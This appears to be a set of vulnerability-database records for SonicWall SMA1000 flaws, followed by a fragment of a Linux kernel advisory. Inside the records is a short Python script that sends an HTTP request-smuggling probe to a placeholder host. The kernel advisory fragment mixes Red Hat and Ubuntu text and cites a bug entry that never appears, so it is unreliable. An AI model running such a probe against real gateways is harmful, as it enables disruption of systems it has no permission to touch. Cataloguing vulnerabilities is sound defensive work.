        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "None",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "High",
            "exploitabilityScore": null,
            "id": "CVE-2023-0126",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2023-0126",
            "trust": 1.8,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202301-1520",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "Pre-authentication path traversal vulnerability in SMA1000 firmware version 12.4.2, which allows an unauthenticated attacker to access arbitrary files and directories stored outside the web root directory. SMA1000 A path traversal vulnerability exists in firmware.Information may be obtained",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      }
    ],
    "trust": 1.62
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2023-0126",
        "trust": 3.2
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262",
        "trust": 0.8
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "id": "VAR-202301-1403",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "VARIoT devices database",
        "id": null
      }
    ],
    "trust": 0.21111111
  },
  "last_update_date": "2023-12-18T12:15:03.998000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SNWLID-2023-0001",
        "trust": 0.8,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2023-0001"
      },
      {
        "title": "SonicWALL SMA1000 series Repair measures for path traversal vulnerabilities",
        "trust": 0.6,
        "url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=222618"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-22",
        "trust": 1.0
      },
      {
        "problemtype": "Path traversal (CWE-22) [NVD evaluation ]",
        "trust": 0.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2023-0001"
      },
      {
        "trust": 0.8,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2023-0126"
      },
      {
        "trust": 0.6,
        "url": "https://cxsecurity.com/cveshow/cve-2023-0126/"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-29T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "date": "2023-01-19T20:15:10.850000",
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "date": "2023-01-19T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2023-06-29T08:08:00",
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      },
      {
        "date": "2023-01-26T18:53:18.723000",
        "db": "NVD",
        "id": "CVE-2023-0126"
      },
      {
        "date": "2023-02-02T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SMA1000\u00a0 Path traversal vulnerability in firmware",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2023-002262"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "path traversal",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202301-1520"
      }
    ],
    "trust": 0.6
  }
}

var-202003-1521
Vulnerability from variot

A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to crash the HTTP server, resulting in a denial of service. This vulnerability affects SMA1000 version 12.1.0-06411 and earlier. The SonicWall SMA1000 is a secure access gateway appliance from SonicWall.
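
The "version 12.1.0-06411 and earlier" bound corresponds to the `versionEndIncluding` field in the CPE match data below. A minimal Python sketch of evaluating that bound, assuming SMA1000 firmware versions always follow the `major.minor.patch-build` shape (an assumption on our part, not something the advisory states):

def parse_version(v: str) -> tuple:
    """Split an SMA1000-style version like '12.1.0-06411' into comparable ints."""
    release, _, build = v.partition("-")
    return tuple(int(p) for p in release.split(".")) + (int(build or 0),)

def is_affected(installed: str, end_including: str = "12.1.0-06411") -> bool:
    # "12.1.0-06411 and earlier" == versionEndIncluding in the CPE match
    return parse_version(installed) <= parse_version(end_including)

print(is_affected("12.1.0-06411"))  # True: the boundary version is affected
print(is_affected("12.4.2"))        # False: a later release (see the record above)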



{
  "@context": {
    "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
    "affected_products": {
      "@id": "https://www.variotdbs.pl/ref/affected_products"
    },
    "configurations": {
      "@id": "https://www.variotdbs.pl/ref/configurations"
    },
    "credits": {
      "@id": "https://www.variotdbs.pl/ref/credits"
    },
    "cvss": {
      "@id": "https://www.variotdbs.pl/ref/cvss/"
    },
    "description": {
      "@id": "https://www.variotdbs.pl/ref/description/"
    },
    "exploit_availability": {
      "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
    },
    "external_ids": {
      "@id": "https://www.variotdbs.pl/ref/external_ids/"
    },
    "iot": {
      "@id": "https://www.variotdbs.pl/ref/iot/"
    },
    "iot_taxonomy": {
      "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
    },
    "patch": {
      "@id": "https://www.variotdbs.pl/ref/patch/"
    },
    "problemtype_data": {
      "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
    },
    "references": {
      "@id": "https://www.variotdbs.pl/ref/references/"
    },
    "sources": {
      "@id": "https://www.variotdbs.pl/ref/sources/"
    },
    "sources_release_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
    },
    "sources_update_date": {
      "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
    },
    "threat_type": {
      "@id": "https://www.variotdbs.pl/ref/threat_type/"
    },
    "title": {
      "@id": "https://www.variotdbs.pl/ref/title/"
    },
    "type": {
      "@id": "https://www.variotdbs.pl/ref/type/"
    }
  },
  "@id": "https://www.variotdbs.pl/vuln/VAR-202003-1521",
  "affected_products": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 1.0,
        "vendor": "sonicwall",
        "version": "12.1.0-06411"
      },
      {
        "model": "sma1000",
        "scope": "eq",
        "trust": 0.8,
        "vendor": "sonicwall",
        "version": "12.1.0-06411"
      },
      {
        "model": "sma1000",
        "scope": "lte",
        "trust": 0.6,
        "vendor": "sonicwall",
        "version": "\u003c=12.1.0-06411"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "configurations": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/configurations#",
      "children": {
        "@container": "@list"
      },
      "cpe_match": {
        "@container": "@list"
      },
      "data": {
        "@container": "@list"
      },
      "nodes": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "CVE_data_version": "4.0",
        "nodes": [
          {
            "children": [
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:o:sonicwall:sma1000_firmware:*:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "versionEndIncluding": "12.1.0-06411",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              },
              {
                "children": [],
                "cpe_match": [
                  {
                    "cpe23Uri": "cpe:2.3:h:sonicwall:sma1000:-:*:*:*:*:*:*:*",
                    "cpe_name": [],
                    "vulnerable": false
                  }
                ],
                "operator": "OR"
              }
            ],
            "cpe_match": [],
            "operator": "AND"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "cve": "CVE-2020-5129",
  "cvss": {
    "@context": {
      "cvssV2": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
      },
      "cvssV3": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
      },
      "severity": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/cvss/severity#"
        },
        "@id": "https://www.variotdbs.pl/ref/cvss/severity"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        },
        "@id": "https://www.variotdbs.pl/ref/sources"
      }
    },
    "data": [
      {
        "cvssV2": [
          {
            "acInsufInfo": false,
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "NVD",
            "availabilityImpact": "PARTIAL",
            "baseScore": 5.0,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "impactScore": 2.9,
            "integrityImpact": "NONE",
            "obtainAllPrivilege": false,
            "obtainOtherPrivilege": false,
            "obtainUserPrivilege": false,
            "severity": "MEDIUM",
            "trust": 1.0,
            "userInteractionRequired": false,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "acInsufInfo": null,
            "accessComplexity": "Low",
            "accessVector": "Network",
            "authentication": "None",
            "author": "NVD",
            "availabilityImpact": "Partial",
            "baseScore": 5.0,
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003422",
            "impactScore": null,
            "integrityImpact": "None",
            "obtainAllPrivilege": null,
            "obtainOtherPrivilege": null,
            "obtainUserPrivilege": null,
            "severity": "Medium",
            "trust": 0.8,
            "userInteractionRequired": null,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P",
            "version": "2.0"
          },
          {
            "accessComplexity": "LOW",
            "accessVector": "NETWORK",
            "authentication": "NONE",
            "author": "CNVD",
            "availabilityImpact": "COMPLETE",
            "baseScore": 7.8,
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 10.0,
            "id": "CNVD-2020-20430",
            "impactScore": 6.9,
            "integrityImpact": "NONE",
            "severity": "HIGH",
            "trust": 0.6,
            "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:C",
            "version": "2.0"
          }
        ],
        "cvssV3": [
          {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "author": "NVD",
            "availabilityImpact": "HIGH",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "exploitabilityScore": 3.9,
            "impactScore": 3.6,
            "integrityImpact": "NONE",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "trust": 1.0,
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.1"
          },
          {
            "attackComplexity": "Low",
            "attackVector": "Network",
            "author": "NVD",
            "availabilityImpact": "High",
            "baseScore": 7.5,
            "baseSeverity": "High",
            "confidentialityImpact": "None",
            "exploitabilityScore": null,
            "id": "JVNDB-2020-003422",
            "impactScore": null,
            "integrityImpact": "None",
            "privilegesRequired": "None",
            "scope": "Unchanged",
            "trust": 0.8,
            "userInteraction": "None",
            "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
            "version": "3.0"
          }
        ],
        "severity": [
          {
            "author": "NVD",
            "id": "CVE-2020-5129",
            "trust": 1.0,
            "value": "HIGH"
          },
          {
            "author": "NVD",
            "id": "JVNDB-2020-003422",
            "trust": 0.8,
            "value": "High"
          },
          {
            "author": "CNVD",
            "id": "CNVD-2020-20430",
            "trust": 0.6,
            "value": "HIGH"
          },
          {
            "author": "CNNVD",
            "id": "CNNVD-202003-1629",
            "trust": 0.6,
            "value": "HIGH"
          }
        ]
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "description": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/description#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "A vulnerability in the SonicWall SMA1000 HTTP Extraweb server allows an unauthenticated remote attacker to cause HTTP server crash which leads to Denial of Service. This vulnerability affected SMA1000 Version 12.1.0-06411 and earlier. SonicWall SMA100 is a secure access gateway device of American SonicWall company",
    "sources": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ],
    "trust": 2.16
  },
  "external_ids": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "db": "NVD",
        "id": "CVE-2020-5129",
        "trust": 3.0
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422",
        "trust": 0.8
      },
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430",
        "trust": 0.6
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629",
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "id": "VAR-202003-1521",
  "iot": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": true,
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ],
    "trust": 0.8111111099999999
  },
  "iot_taxonomy": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "category": [
          "Network device"
        ],
        "sub_category": null,
        "trust": 0.6
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      }
    ]
  },
  "last_update_date": "2023-12-18T12:56:05.709000Z",
  "patch": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/patch#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "title": "SNWLID-2020-0002",
        "trust": 0.8,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2020-0002"
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      }
    ]
  },
  "problemtype_data": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "problemtype": "CWE-444",
        "trust": 1.8
      }
    ],
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      }
    ]
  },
  "references": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/references#",
      "data": {
        "@container": "@list"
      },
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": [
      {
        "trust": 2.0,
        "url": "https://nvd.nist.gov/vuln/detail/cve-2020-5129"
      },
      {
        "trust": 1.6,
        "url": "https://psirt.global.sonicwall.com/vuln-detail/snwlid-2020-0002"
      },
      {
        "trust": 0.8,
        "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2020-5129"
      }
    ],
    "sources": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources_release_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "date": "2020-03-26T13:15:13.327000",
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "date": "2020-03-26T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "sources_update_date": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
      "data": {
        "@container": "@list"
      }
    },
    "data": [
      {
        "date": "2020-04-07T00:00:00",
        "db": "CNVD",
        "id": "CNVD-2020-20430"
      },
      {
        "date": "2020-04-16T00:00:00",
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      },
      {
        "date": "2020-03-30T17:29:50.863000",
        "db": "NVD",
        "id": "CVE-2020-5129"
      },
      {
        "date": "2020-03-31T00:00:00",
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ]
  },
  "threat_type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "remote",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ],
    "trust": 0.6
  },
  "title": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/title#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "SonicWall SMA1000 HTTP Extraweb On the server  HTTP Request Smagling Vulnerability",
    "sources": [
      {
        "db": "JVNDB",
        "id": "JVNDB-2020-003422"
      }
    ],
    "trust": 0.8
  },
  "type": {
    "@context": {
      "@vocab": "https://www.variotdbs.pl/ref/type#",
      "sources": {
        "@container": "@list",
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#"
        }
      }
    },
    "data": "environmental issue",
    "sources": [
      {
        "db": "CNNVD",
        "id": "CNNVD-202003-1629"
      }
    ],
    "trust": 0.6
  }
}
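The record above classifies CVE-2020-5129 under CWE-444 (HTTP request smuggling). As an illustration of that weakness class only, and not a working exploit for the SMA1000, the lab-only Python sketch below sends a request whose Content-Length and Transfer-Encoding headers disagree; a front end and back end that honor different headers then desynchronize on where the request ends. Host and port are placeholders.

    import socket

    # Lab-only CWE-444 illustration: Content-Length says the body is 6 bytes,
    # Transfer-Encoding says it is an empty chunked body. Two servers in a
    # chain that trust different headers disagree on where this request ends.
    HOST, PORT = "gateway.lab.example", 80  # placeholders, not a real target

    probe = (
        b"POST / HTTP/1.1\r\n"
        b"Host: gateway.lab.example\r\n"
        b"Content-Length: 6\r\n"
        b"Transfer-Encoding: chunked\r\n"
        b"\r\n"
        b"0\r\n"
        b"\r\n"
        b"G"  # stray byte a desynchronized parser prepends to the next request
    )

    with socket.create_connection((HOST, PORT), timeout=5) as s:
        s.sendall(probe)
        print(s.recv(4096).decode(errors="replace"))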

var-202107-1361
Vulnerability from variot

fs/seq_file.c in the Linux kernel 3.16 through 5.13.x before 5.13.4 does not properly restrict seq buffer allocations, leading to an integer overflow, an Out-of-bounds Write, and escalation to root by an unprivileged user, aka CID-8cae8cd89f05. 8.1) - ppc64le, x86_64
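Bug 1970273 in the advisory below describes this flaw as a size_t-to-int conversion in the filesystem layer: a seq buffer that has legitimately grown past 2 GiB becomes negative once its size lands in a signed 32-bit int, defeating later bounds checks. A minimal Python sketch of that arithmetic (the constant is illustrative, not taken from the kernel source):

    # Emulate assigning an unsigned 64-bit size_t to a signed 32-bit C int.
    def to_c_int(n):
        n &= 0xFFFFFFFF                     # keep the low 32 bits
        return n - 0x100000000 if n >= 0x80000000 else n

    size = 0x80000000                       # 2 GiB: a perfectly valid size_t
    print(hex(size), "->", to_c_int(size))  # -> -2147483648, negative as an int

    # A later signed C comparison such as 'if (offset < size)' now accepts
    # wildly out-of-range offsets, the condition behind the out-of-bounds write.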

  1. Description:

This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.
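Once the live patch RPM is installed, the patch modules applied to the running kernel can be listed with the kpatch client (a quick check, assuming the standard kpatch tooling is present):

    $ kpatch list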

ATTENTION: Due to an unavoidable ABI change the kernel updates have been given a new version number, which requires you to recompile and reinstall all third party kernel modules you might have installed. Unless you manually uninstalled the standard kernel metapackages (e.g. linux-generic, linux-generic-lts-RELEASE, linux-virtual, linux-powerpc), a standard system upgrade will automatically perform this as well. 7.7) - ppc64, ppc64le, x86_64
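For third-party modules managed through DKMS, the required rebuild can be inspected and triggered explicitly (a sketch, assuming DKMS-managed modules; modules installed by other means must be rebuilt per their vendor's instructions):

    $ dkms status
    $ sudo dkms autoinstall -k $(uname -r)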

  1. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64 Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64 Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, x86_64 Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64 Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

  1. Description:

The kernel packages contain the Linux kernel, the core of any Linux operating system.

Bug Fix(es):

  • [RHEL7.9.z] n_tty_open: "BUG: unable to handle kernel paging request" (BZ#1872778)

  • [ESXi][RHEL7.8]"qp_alloc_hypercall result = -20" / "Could not attach to queue pair with -20" with vSphere Fault Tolerance enabled (BZ#1892237)

  • [RHEL7.9][s390x][Regression] Sino Nomine swapgen IBM z/VM emulated DASD with DIAG driver returns EOPNOTSUPP (BZ#1910395)

  • False-positive hard lockup detected while processing the thread state information (SysRq-T) (BZ#1912221)

  • RHEL7.9 zstream - s390x LPAR with NVMe SSD will panic when it has 32 or more IFL (pci) (BZ#1917943)

  • The NMI watchdog detected a hard lockup while printing RCU CPU stall warning messages to the serial console (BZ#1924688)

  • nvme hangs when trying to allocate reserved tag (BZ#1926825)

  • [REGRESSION] "call into AER handling regardless of severity" triggers do_recovery() unnecessarily on correctable PCIe errors (BZ#1933663)

  • Module nvme_core: A double free of the kmalloc-512 cache between nvme_trans_log_temperature() and nvme_get_log_page(). (BZ#1946793)

  • sctp - SCTP_CMD_TIMER_START queues active timer kernel BUG at kernel/timer.c:1000! (BZ#1953052)

  • [Hyper-V][RHEL-7]When CONFIG_NET_POLL_CONTROLLER is set, mainline commit 2a7f8c3b1d3fee is needed (BZ#1953075)

  • Kernel panic at cgroup_is_descendant (BZ#1957719)

  • [Hyper-V][RHEL-7]Commits To Fix Kdump Failures (BZ#1957803)

  • IGMPv2 JOIN packets incorrectly routed to loopback (BZ#1958339)

  • [CKI kernel builds]: x86 binaries in non-x86 kernel rpms breaks systemtap [7.9.z] (BZ#1960193)

  • mlx4: Fix memory allocation in mlx4_buddy_init needed (BZ#1962406)

  • incorrect assertion on pi_state->pi_mutex.wait_lock from pi_state_update_owner() (BZ#1965495)

  • Solution:

For details on how to apply this update, which includes the changes described in this advisory, refer to:

https://access.redhat.com/articles/11258
